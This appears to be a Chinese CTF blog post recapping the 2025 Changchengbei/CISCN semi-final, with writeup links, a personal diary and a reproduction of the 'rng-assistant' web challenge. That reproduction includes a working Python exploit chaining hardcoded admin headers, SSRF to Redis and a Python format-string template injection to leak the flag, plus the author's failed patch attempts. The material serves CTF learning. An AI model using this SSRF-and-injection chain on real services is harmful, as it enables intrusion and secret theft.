<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            20250315长城杯半决赛
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">20250315长城杯半决赛</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2025-03-18
                        </span>
                        
                            
                                <span id="/2025/03/18/20250315长城杯半决赛/" class="leancloud_visitors" data-flag-title="20250315长城杯半决赛">
                                    <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                                </span>
                            
                            
                                <span>
                                    <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2025/03/18/20250315长城杯半决赛/"></span>
                                </span>
                              
                        
                    </p>
                    
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h2 id="前言">前言</h2>
<p>本来想认真记录并复盘的，结果实在是打得太烂了，只能以复盘+日记为主了。</p>
<hr />
<h2 id="wp-整理">WP 整理</h2>
<p>先整理了一下其他师傅的 WP</p>
<h4 id="awdp">AWDP</h4>
<ul>
<li>php-master(web-pwn)</li>
<li>time-capsule(web)</li>
<li>blog(web)</li>
<li>ccforum(web)</li>
<li>chatroom(web)</li>
<li>rng-assistant(web)</li>
<li>prompt(pwn)</li>
<li>typo(pwn)</li>
<li>post_quantum(pwn)</li>
</ul>
<h4 id="isw">ISW</h4>
<ul>
<li>应急响应</li>
<li>数据库管理系统</li>
<li>Web-Git</li>
<li>CCB2025</li>
</ul>
<h4 id="writeup">writeup</h4>
<ul>
<li><code>应急响应</code>：<a
target="_blank" rel="noopener" href="https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/blog/2025CCB&amp;CISCN-Semis-ISW/">2025
长城杯 &amp; 国赛 半决赛 ISW | Target Machines WriteUp</a></li>
<li><code>php-master</code> <code>time-capsule</code>
<code>应急响应</code> <code>数据库管理系统</code>
<code>Web-Git</code>：<a
target="_blank" rel="noopener" href="https://nvme0n1p.dev/post/2025-ciscn-ccb-semi-wp">2025
CISCN&amp;长城杯半决赛部分题解 | 溴化锂的笔记本</a></li>
<li><code>typo(pwn)</code>：<a
target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-286051.htm">[原创]长城杯2025
pwn-typo| 看雪 狗狗不赖啊</a></li>
<li><code>post_quantum(pwn)</code> <code>prompt(pwn)</code>
<code>typo(pwn)</code>：<a
target="_blank" rel="noopener" href="https://j1ya-22.github.io/2025/03/16/2025ciscn-ccb%E6%B5%99%E6%B1%9F%E8%B5%9B%E5%8C%BA%E5%8D%8A%E5%86%B3%E8%B5%9B/">2025ciscn&amp;ccb浙江赛区半决赛
| j1ya</a></li>
<li><code>typo(pwn)</code> <code>prompt(pwn)</code>
<code>php-master(web-pwn)</code> <code>post_quantum(pwn)</code> <a
target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-286086.htm">[原创]CCB_CISCN_半决赛-AWDP-Pwn
| 看雪 imLZH1</a></li>
<li><code>ccforum(web)</code> <code>rng-assistant(web)</code>
<code>php-master(web-pwn)</code> <code>应急响应</code>
<code>数据库管理系统</code> <code>Web-Git</code>
https://jbnrz.com.cn/index.php/2025/03/16/2025-ciscn-x-ccb-semi/</li>
<li><code>typo(pwn)</code> <code>prompt(pwn)</code>
<code>post_quantum(pwn)</code> <code>应急响应</code><a
target="_blank" rel="noopener" href="https://www.cnblogs.com/r-b-p/p/18778871">第二届长城杯ciscn半决赛awdp
pwn以及应急响应wp | rbp</a></li>
<li><code>php-master(web-pwn)</code> <code>prompt(pwn)</code>
<code>typo(pwn)</code> <code>post_quantum(pwn)</code>
<code>rng-assistant(web)</code> <a
target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/Ygg4bm9y27vskWyxFR2vOw">CISCN 2025
半决赛 writeup by 0psu3</a></li>
<li><code>rng-assistant(web)</code> <code>ccforum(web)</code>
<code>typo(pwn)</code> <code>prompt(pwn)</code>
<code>post_quantum(pwn)</code> <code>Web-Git</code>
<code>应急响应</code> <code>数据库管理系统</code> <code>CCB2025</code>
<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/0e8avtn3o_jZJbh3UDUdzw">2025
CISCN&amp;CCB Half-Final WP</a></li>
<li><code>typo(pwn)</code> <a
target="_blank" rel="noopener" href="https://blog.csdn.net/a19106051385/article/details/146318753">ciscn
&amp; 长城杯 2025半决赛 pwn typo</a></li>
<li><code>typo(pwn)</code> <a
target="_blank" rel="noopener" href="https://blog.csdn.net/XiDPPython/article/details/146384414">CISCN
&amp;&amp; 长城杯 2025半决赛 Pwn-typo wp(含附件)</a></li>
<li><code>time-capsule(web)</code> <a
target="_blank" rel="noopener" href="https://err0r233.github.io/posts/16382.html">CISCN&amp;长城杯2025半决赛awdp复现——TimeCapsule
Err0r233</a></li>
<li><code>rng-assistant(web)</code> <code>php-master(web-pwn)</code>
<code>ccforum(web)</code> <code>应急响应</code> <code>Web-Git</code>
<del><code>CCB2025</code></del> <a
target="_blank" rel="noopener" href="https://err0r233.github.io/posts/35955.html">CISCN&amp;长城杯2025半决赛复盘
Err0r233</a></li>
</ul>
<h2 id="复现">复现</h2>
<p>线下时主要再打 RNG，现在复现一下 RNG 试试。</p>
<h3 id="rng-assistantweb">rng-assistant(web)</h3>
<h4 id="break">break</h4>
<p>目录结构</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── app</span><br><span class="line">│   ├── app.py</span><br><span class="line">│   ├── flag.py</span><br><span class="line">│   ├── mini-ollama</span><br><span class="line">│   │   ├── default.py</span><br><span class="line">│   │   ├── math-v1.py</span><br><span class="line">│   │   └── mini_ollama.py</span><br><span class="line">│   └── static</span><br><span class="line">│       ├── prompts</span><br><span class="line">│       │   └── math-v1.txt</span><br><span class="line">│       └── public</span><br><span class="line">├── docker-compose.yml</span><br><span class="line">├── Dockerfile</span><br><span class="line">├── flask_app.conf</span><br><span class="line">└── start.sh</span><br></pre></td></tr></table></figure>
<p>比赛时看了好久没打出来<em><del>(不过天津赛区好像最后也双双爆零哈哈)</del></em>，事后看了师傅们的
wp 感觉还不算很离谱，如果对 redis&amp;SSTI 更敏感的话应该能做出来</p>
<p><code>app.py</code> 开局将 <code>flag.py</code> <code>import</code>
了，目前看可以考虑从 <code>app.py</code> 下手，或直接读取文件</p>
<p>整理一下路由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/</span><br><span class="line">/register</span><br><span class="line">/login</span><br><span class="line">/ask</span><br><span class="line">/admin/raw_ask</span><br><span class="line">/admin/model_ports</span><br></pre></td></tr></table></figure>
<p><code>/register</code> <code>/login</code>
常规的注册登录，<code>/ask</code>
带模板的问，<code>/admin/raw_ask</code>
直接控制提示词，<code>/admin/model_ports</code>
注意到可以自由设定端口。</p>
<p>很自然的想到 <code>/admin/model_ports</code> 写 <code>6379</code>
端口，然后 <code>/admin/raw_ask</code> 能直接发送请求(像
<code>SSRF</code> 一样)，测试一下也确实能连到
<code>redis</code>，但是权限极低，无法写入文件，(赛后尝试)无法主从复制。</p>
<p>仔细分析一下危险部分：</p>
<p>第一个是 <code>model_query</code> 函数，首先试图读取
<code>redis</code>
缓存，没有则请求模型，但有则直接返回，没有可利用的点，比赛时就卡这了。</p>
<p>第二个是 <code>PromptTemplate</code> 类的 <code>get_template</code>
函数，会尝试<strong>读取缓存</strong>或读取本地文件，<strong>之后在
<code>get_prompt</code> 函数中进行了 <code>.format(t=self)</code>
处理</strong>。<code>template_id</code> 不可控，无法让他从读取
<code>math-v1.txt</code> 转而读取 <code>../flag.py</code>，但是
<code>redis</code> 缓存是可以的，只要指定一个键
<code>prompt:math-v1</code> 即可。</p>
<p>第三是 <code>/ask</code> 路由会同时返回 <code>answer</code> 和
<code>prompt</code>，前者是无用的，后者恰好是我们需要的，保证我们能够看到被模板注入后的提示词。</p>
<p>整个 <code>exploit</code>流程如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注册账号 -&gt; 登录账号 -&gt; 注册模型 -&gt; SSRF redis 写入缓存 -&gt; /ask SSTI 模板注入</span><br></pre></td></tr></table></figure>
<p><code>exploit</code> 脚本如下</p>
<p>P.S. 搓了一个 python 解析 HTTP 报文的代码，不知道实用与否。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">RHOST = <span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line">RPORT = <span class="number">18082</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">parse_http_request</span>(<span class="params">raw_request</span>):</span><br><span class="line">    lines = raw_request.strip().replace(<span class="string">&#x27;\r\n&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>).split(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">    request_line = lines[<span class="number">0</span>].strip()</span><br><span class="line">    method, url, _ = request_line.split()</span><br><span class="line">    </span><br><span class="line">    headers = &#123;&#125;</span><br><span class="line">    data = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="built_in">len</span>(lines)):</span><br><span class="line">        line = lines[i].strip()</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> line:</span><br><span class="line">            data = <span class="string">&#x27;\n&#x27;</span>.join(lines[i+<span class="number">1</span>:]).lstrip(<span class="string">&#x27;\r&#x27;</span>).strip(<span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;:&#x27;</span> <span class="keyword">in</span> line:</span><br><span class="line">            key, value = line.split(<span class="string">&#x27;:&#x27;</span>, <span class="number">1</span>)</span><br><span class="line">            headers[key.strip()] = value.strip()</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> method.lower(), url, headers, data</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_http_request</span>(<span class="params">raw_request</span>):</span><br><span class="line">    method, url, headers, data = parse_http_request(raw_request)</span><br><span class="line">    </span><br><span class="line">    response = requests.request(</span><br><span class="line">        method=method,</span><br><span class="line">        url=url,</span><br><span class="line">        headers=headers,</span><br><span class="line">        data=data.encode(<span class="string">&#x27;utf-8&#x27;</span>) <span class="keyword">if</span> data <span class="keyword">else</span> <span class="literal">None</span>,</span><br><span class="line">        allow_redirects=<span class="literal">False</span></span><br><span class="line">    )</span><br><span class="line">    <span class="keyword">return</span> response</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">req_1 = <span class="string">f&quot;&quot;&quot;\</span></span><br><span class="line"><span class="string">POST http://<span class="subst">&#123;RHOST&#125;</span>:<span class="subst">&#123;RPORT&#125;</span>/register HTTP/1.1</span></span><br><span class="line"><span class="string">Host: <span class="subst">&#123;RHOST&#125;</span></span></span><br><span class="line"><span class="string">Content-Type: application/json</span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;&quot;username&quot;: &quot;metamiku&quot;, &quot;password&quot;: &quot;123456&quot;&#125;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">resp_1 = send_http_request(req_1)</span><br><span class="line"><span class="built_in">print</span>(resp_1.content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">req_2 = <span class="string">f&quot;&quot;&quot;\</span></span><br><span class="line"><span class="string">POST http://<span class="subst">&#123;RHOST&#125;</span>:<span class="subst">&#123;RPORT&#125;</span>/login HTTP/1.1</span></span><br><span class="line"><span class="string">Host: <span class="subst">&#123;RHOST&#125;</span></span></span><br><span class="line"><span class="string">Content-Type: application/json</span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;&quot;username&quot;: &quot;metamiku&quot;, &quot;password&quot;: &quot;123456&quot;&#125;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">resp_2 = send_http_request(req_2)</span><br><span class="line"><span class="built_in">print</span>(resp_2.content)</span><br><span class="line">cookie = resp_2.headers.get(<span class="string">&#x27;Set-Cookie&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">req_3 = <span class="string">f&quot;&quot;&quot;\</span></span><br><span class="line"><span class="string">POST http://<span class="subst">&#123;RHOST&#125;</span>:<span class="subst">&#123;RPORT&#125;</span>/admin/model_ports HTTP/1.1</span></span><br><span class="line"><span class="string">Host: <span class="subst">&#123;RHOST&#125;</span></span></span><br><span class="line"><span class="string">Content-Type: application/json</span></span><br><span class="line"><span class="string">X-User-Role: admin</span></span><br><span class="line"><span class="string">X-Secret: 210317a2ee916063014c57d879b9d3bc</span></span><br><span class="line"><span class="string">Cookie: <span class="subst">&#123;cookie&#125;</span></span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;&quot;model_id&quot;: &quot;redis&quot;, &quot;port&quot;: 6379&#125;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">resp_3 = send_http_request(req_3)</span><br><span class="line"><span class="built_in">print</span>(resp_3.content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">req_4 = <span class="string">f&quot;&quot;&quot;\</span></span><br><span class="line"><span class="string">POST http://<span class="subst">&#123;RHOST&#125;</span>:<span class="subst">&#123;RPORT&#125;</span>/admin/raw_ask HTTP/1.1</span></span><br><span class="line"><span class="string">Host: <span class="subst">&#123;RHOST&#125;</span></span></span><br><span class="line"><span class="string">Content-Type: application/json</span></span><br><span class="line"><span class="string">X-User-Role: admin</span></span><br><span class="line"><span class="string">X-Secret: 210317a2ee916063014c57d879b9d3bc</span></span><br><span class="line"><span class="string">Cookie: <span class="subst">&#123;cookie&#125;</span></span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;&quot;model_id&quot;: &quot;redis&quot;, &quot;prompt&quot;: &quot;  set prompt:math-v1 &#123;&#123;t.get_template.__globals__&#125;&#125; \\r\\n&quot;&#125;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">resp_4 = send_http_request(req_4)</span><br><span class="line"><span class="built_in">print</span>(resp_4.content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">req_5 = <span class="string">f&quot;&quot;&quot;\</span></span><br><span class="line"><span class="string">POST http://<span class="subst">&#123;RHOST&#125;</span>:<span class="subst">&#123;RPORT&#125;</span>/ask HTTP/1.1</span></span><br><span class="line"><span class="string">Host: <span class="subst">&#123;RHOST&#125;</span></span></span><br><span class="line"><span class="string">Content-Type: application/json</span></span><br><span class="line"><span class="string">Cookie: <span class="subst">&#123;cookie&#125;</span></span></span><br><span class="line"><span class="string">Connection: close</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;&quot;question&quot;: &quot;1&quot;&#125;&#125;</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">resp_5 = send_http_request(req_5)</span><br><span class="line"><span class="built_in">print</span>(resp_5.content)</span><br></pre></td></tr></table></figure>
<p>最后从 <code>prompt</code> 中拿到一大串东西，找到 <code>FLAG</code>
即可</p>
<h4 id="fix">fix</h4>
<p>修不出来，十次全爆了，当时排行榜上也无解，官方也不给
<code>check</code> 脚本(强烈建议所有 <code>AWDP</code> 比赛放出
<code>check</code> 脚本，不然打完根本学不到什么东西)，加上题目描述说用
<code>sed</code>，乱上加乱(听说不用
<code>sed</code>，直接替换也行，但是没试出来)，网上没找到哪位师傅线下做出来了的。</p>
<p>下面介绍一下我 <code>check</code> 错的主要方案：</p>
<ol type="1">
<li>定位错了路径：exp 利用成功</li>
<li>直接删除 <code>app.py</code>：异常</li>
<li>直接ban掉整个api，exp利用成功（rnm）</li>
</ol>
<h5 id="第五次-check">第五次 check：</h5>
<p><code>update.sh</code></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">sed -i <span class="string">&#x27;/port = data.get(&quot;port&quot;)/a \</span></span><br><span class="line"><span class="string">    if port == 6379:\</span></span><br><span class="line"><span class="string">        return jsonify(&#123;&quot;error&quot;: &quot;Access denied&quot;&#125;), 403&#x27;</span> /app/app/app.py</span><br><span class="line">sed -i <span class="string">&#x27;/port = data.get(&quot;port&quot;)/a \</span></span><br><span class="line"><span class="string">    if port == 6379:\</span></span><br><span class="line"><span class="string">        return jsonify(&#123;&quot;error&quot;: &quot;Access denied&quot;&#125;), 403&#x27;</span> /app/app.py</span><br></pre></td></tr></table></figure>
<p>结果: exp利用成功</p>
<h5 id="第九次-check">第九次 check：</h5>
<p><code>app.py</code> 中 <code>manage_model_ports</code> 后直接
<code>return jsonify(&#123;"error": "Access denied"&#125;), 403</code></p>
<p><code>update.sh</code></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">mv</span> ./app.py /app/</span><br></pre></td></tr></table></figure>
<p>结果: exp利用成功</p>
<p>总结：人崩溃了，似都不知道怎么似的</p>
<p>20250409</p>
<hr />
<h2 id="日记">日记</h2>
<p>看别的师傅经常在线下赛的博客上记录一下，我也想试试</p>
<p>20250315</p>
<p>早上六点出发。坐上飞机，从起飞睡到降落，下机的时候着急忙慌，耳机挂在了前座，走到廊道发现不对劲，又折返回飞机上找耳机（悲）。</p>
<p>下午步行去天津理工大学试验环境，同时试了以下前些天搭建的 <a
target="_blank" rel="noopener" href="https://tailchat.msgbyte.com/">TailChat</a>
聊天室，很好用(除了大文件上传)，同时听到旁边队伍的几位师傅似乎也有在讨论聊天室的搭建。</p>
<p>赛中的 fix
是真的抽象，队友pwn✌修的明明和赛后其他师傅的方案一样，但是当时就是 check
不过，我自己的RNG也不过，难受。</p>
<p>有想法打几个 AWDP
的比赛练练手，主要是完全不知道该如何去修这东西，也不知道 check
的机制。也许可以尝试出一次题来看看出题者的视角？</p>
<p>赛中去卫生间竟然只是简单登记，<del><em>真的不会有人浑水摸鱼吗？</em></del></p>
<p>天津理工的花很好看，非常好看。</p>
<p><img src="/image/articles/20250315长城杯半决赛.assets/IMG_20250316_080016.jpg" alt="IMG_20250316_080016" style="zoom: 12.5%;" /></p>
<p><img src="/image/articles/20250315长城杯半决赛.assets/IMG_20250316_080105.jpg" alt="IMG_20250316_080105" style="zoom:12.5%;" /></p>
<p><img src="/image/articles/20250315长城杯半决赛.assets/IMG_20250316_080116.jpg" alt="IMG_20250316_080116" style="zoom:12.5%;" /></p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/avatar.jpg" alt="MetaMiku">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>MetaMiku
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2025/03/18/20250315%E9%95%BF%E5%9F%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B/" target="_blank">20250315长城杯半决赛</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>铁血的热血的冷血的.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                <div class="article-prev-next">
                    
                        <a href="/2025/04/01/Project-Sekai-%E9%80%86%E5%90%91%E7%AC%94%E8%AE%B0/" class="prev-prefix">« </a> 上一篇：    <a href="/2025/04/01/Project-Sekai-%E9%80%86%E5%90%91%E7%AC%94%E8%AE%B0/" title="发布于 2025-04-01 10:04">Project Sekai 逆向笔记</a>
                        <br>
                    
                    
                        <a href="/2025/02/25/Coppersmith%E5%AD%A6%E4%B9%A0/" class="next-prefix">» </a> 下一篇：    <a href="/2025/02/25/Coppersmith%E5%AD%A6%E4%B9%A0/" title="发布于 2025-02-25 06:30">Coppersmith学习</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>
    
 
        </div>
    
</div>

  
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
  });
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2.7.8/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


    <div id="footer">
    <div>【MetaMiku—neither self nor Miku, but a flicker between realities in the Meta SEKAI of my pulse.】</div><div>&copy; 2020-2025 MetaMiku. All Rights Reserved.</div>
</div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>铁血的热血的冷血的</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/avatar.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user">
                        
                            <a href="metamiku.top" target="_blank"><span>MetaMiku</span></a>
                        
                    </div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archives" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="GitHub" href="https://github.com/MetaMikuAI" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>
    <div class="wrap-right">
    <div class="wrap-right-hide">
         <div class="wrap-right-button favorites">
            <div class="iconbox" switch="false">
                <span class="iconfont icon-favorites"></span>
            </div>
            <span class="icontext">关注</span>
         </div>
        <div class="wrap-right-button search">
            <div class="iconbox">
                <span class="iconfont icon-search-menu"></span>
            </div>
            <span class="icontext">搜索</span>
        </div>
        <div class="wrap-right-button menu-button">
            <div class="iconbox">
                <span class="iconfont icon-menu"></span>
            </div>
            <span class="icontext">菜单</span>
        </div>
        <div class="wrap-right-button mode">
            <div class="light">
                <div class="iconbox">
                    <span class="iconfont icon-daymode"></span>
                </div>
                <span class="icontext">浅色模式</span>
            </div>
            <div class="dark">
                <div class="iconbox">
                    <span class="iconfont icon-nightmode-fill"></span>
                </div>
                <span class="icontext">深色模式</span>
            </div>
        </div>
        <div class="wrap-right-button bottom">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
